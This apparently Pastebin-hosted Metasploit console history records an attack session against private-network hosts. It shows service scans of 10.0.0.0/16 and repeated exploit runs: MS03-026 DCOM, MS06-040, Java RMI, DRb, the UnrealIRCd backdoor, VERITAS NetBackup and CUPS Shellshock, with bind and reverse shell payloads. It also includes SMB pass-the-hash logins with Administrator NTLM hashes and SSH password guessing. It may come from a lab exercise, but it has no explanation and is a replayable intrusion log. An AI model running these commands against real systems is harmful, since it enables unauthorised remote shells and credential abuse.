Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- use exploit/windows/smb/ms06_040_netapi
- set RHOST 10.0.1.70
- set TARGET 5
- use payload windows/meterpreter/bind_tcp
- set payload windows/meterpreter/bind_tcp
- exploit
- exploit
- show options
- connect
- info exploit/windows/smb/ms06_040_netapi
- exploit
- use exploit/windows/dcerpc/ms03_026_dcom
- set RHOST 10.0.1.70
- set PAYLOAD windows/shell_bind_tcp
- exploit -j
- sessions
- sessions -i 1
- sessions -i 1
- sessions
- exploit
- use exploit/windows/dcerpc/ms03_026_dcom
- set RHOST 10.0.1.65
- set RPORT 135
- show options
- exploit
- sessions -i 1
- sessions
- exploit -i
- show options
- exploit
- show targets
- set SMBUser Administrator
- set SMBPass c6100ace80e48267b3cc7c3990963222:e36724ee23318dcf3a8c4a3865764d24
- search smb_login
- use auxiliary/scanner/smb/smb_login
- options
- show options
- set rhosts 10.0.1.60
- run
- set SMBUser Administrator
- set SMBPass
- set SMBPass c6100ace80e48267b3cc7c3990963222:e36724ee23318dcf3a8c4a3865764d24
- set rhosts 10.0.1.60
- search smb_login
- db_status
- db_rebuild_cache
- db_rebuild_cache
- db_status
- use exploit/multi/misc/java_rmi_server
- set rhosts 10.0.1.60
- set rport 1099
- set payload java/shell/bind_tcp
- exploit
- set rhost 10.0.1.60
- exploit
- use exploit/multi/misc/java_rmi_server
- set RHOST 10.0.1.60
- exploit
- unset payload
- unset rport
- exploit
- show options
- exit
- use exploit/multi/misc/java_rmi_server
- set RHOST 10.0.1.60
- exploit
- unset
- unset -g rhost
- unset -g
- unset
- back
- use exploit/multi/misc/java_rmi_server
- set RHOST 10.0.1.60
- exploit
- use exploit/linux/misc/drb_remote_codeexec
- options
- set payload cmd/unix/bind_netcat
- set URI druby://10.0.1.60:8787
- show options
- set RHOST 10.0.1.60
- exploit
- use exploit/unix/irc/unreal_ircd_3281_backdoor
- set RHOST 10.0.1.50
- set rport 6667
- set payload cmd/unix/bind_ruby
- exploit
- back
- search netbackup
- use exploit/multi/misc/veritas_netbackup_cmdexec 2004-10-21 excellent VERITAS NetBackup
- set lport 6666
- run
- set rhost 10.0.1.41
- set rport 6666
- run
- show options
- set target 0
- show options
- show options
- exploit
- back
- set rport 6666
- set rhost 10.0.1.41
- use exploit/multi/misc/veritas_netbackup_cmdexec 2004-10-21 excellent VERITAS NetBackup
- use exploit/multi/misc/veritas_netbackup_cmdexec
- exploit
- set rport 13782
- exploit
- use exploit/unix/irc/unreal_ircd_3281_backdoor
- set RHOST 10.0.1.41
- set RPORT
- set PAYLOAD generic/shell_bind_tcp
- set PAYLOAD generic/shell_bind_tcp
- show options
- show info
- set PAYLOAD cmd/unix/bind_netcat
- set PAYLOAD cmd/unix/generic
- exploit
- show options
- set PAYLOAD cmd/unix/reverse
- show options
- show
- use exploit/multi/misc/veritas_netbackup_cmdexec
- help
- set
- set rhost 10.0.1.41
- show targets
- check
- set rport 6666
- check
- exploit
- back
- show
- search ftp
- db_status
- db_status
- exit
- search ftppp
- use exploit/unix/irc/unreal_ircd_3281_backdoor
- show options
- set rhost 10.0.1.41
- set rport 6666
- set lhost 192.168.56.102
- set lport 12345
- show payload
- show payloads
- set payload cmd/unix/bind_perl
- exploit
- exploit
- rexploit
- rcheck
- rexploit
- search sshv1
- search cups
- use post/multi/escalate/cups_root_file_read
- show options
- set rhost 10.0.1.41
- set rport 631
- exploit
- use exploit/multi/http/cups_bash_env_exec
- show options
- set rhost 10.0.1.41
- exploit
- show payloads
- set payload cmd/unix/generic
- exploit
- set payload cmd/unix/bind_ruby
- exploit
- search ssh
- use exploit/multi/ssh/sshexec
- show options
- set rhost 10.0.1.41
- exploit
- set password
- exploit
- set password ''
- exploit
- set password 123
- exploit
- back
- search irc
- use exploit/unix/irc/unreal_ircd_3281_backdoor
- set rhost 10.0.1.35
- set rport 631
- show opitons
- show options
- exploit
- exploit -j
- sessions
- use exploit/windows/dcerpc/ms03_026_dcom
- set LHOST 10.0.2.15
- set RPORT 135
- set RHOST 10.0.2.70
- set LHOST 10.0.2.6
- set PAYLOAD windows/meterpreter/bind_tcp
- set TARGET 0
- exploit
- set RHOST 10.0.1.70
- exploit
- db_nmap -v -SV 10.0.0.0/16
- hosts
- db_nmap -v -sV 10.0.0.0/24
- hosts
- db_nmap -v -sV 10.0.1.0/24
- hosts
- db_nmap -v -sV 10.0.2.0/24
- hosts
- db_nmap -v -sV 10.0.3.0/24
- hosts
- db_nmap -v -sV 10.0.4.0/24
- hosts
- db_nmap -v -sV 10.0.5.0/24
- db_nmap -v -sV 10.0.6.0/24
- db_nmap -v -sV 10.0.7.0/24
- db_nmap -v -sV 10.0.8.0/24
- hosts
- db_nmap -v -sV 10.0.9.0/24
- hosts
- hosts
- db_nmap -v -sV 10.0.1.0/24
- hosts
- db_nmap -sP 10.0.1.0/24
- hosts
- cd ÂŽ~/
- help
- version
- cd ÂÂ~/.msf4/
- color
- color true
- help ?
- exit
- cd usr
- cd /usr/
- cd share
- cd metasploit-framework
- exit
- help
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement